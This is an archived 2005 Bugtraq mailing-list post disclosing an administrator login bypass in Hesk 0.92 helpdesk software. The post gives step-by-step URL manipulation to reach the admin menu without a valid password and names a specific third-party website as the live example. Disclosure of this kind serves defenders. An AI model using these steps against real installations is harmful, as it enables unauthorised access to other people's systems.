Vulnerability in Helpdesk software Hesk 0.92

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vulnerability in Helpdesk software Hesk 0.92
From: s2b@xxxxxxxxxxx
Date: 29 Aug 2005 12:26:14 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

By The Name Of Allah

Vulnerability in Helpdesk software Hesk ..

Vulnerability Type : Login into The Administrator Menu With out Password

Injected version : Helpdesk software Hesk 0.92

Vulnerability Example

http://www.springporttwppd.com/helpdesk/

add : admin.php

http://www.springporttwppd.com/helpdesk/admin.php

Choose the username : administrator

Put any password in the password field

change the url to : admin_main.php

http://www.springporttwppd.com/helpdesk/admin_main.php

You Are Noe in the Administrator menu ..

Thx For  : Devil-00 & ADBUCTER

Peace

Follow-Ups:
- Re: Vulnerability in Helpdesk software Hesk 0.92
  - From: Thomas Krüger

Prev by Date: Re: unload event in ie/mozilla/opera
Next by Date: WASC-Articles: 'Preventing Log Evasion in IIS'
Previous by thread: SimplePHPBlog Arbitrary File Deletion and Sample Exploit
Next by thread: Re: Vulnerability in Helpdesk software Hesk 0.92
Index(es):
- Date
- Thread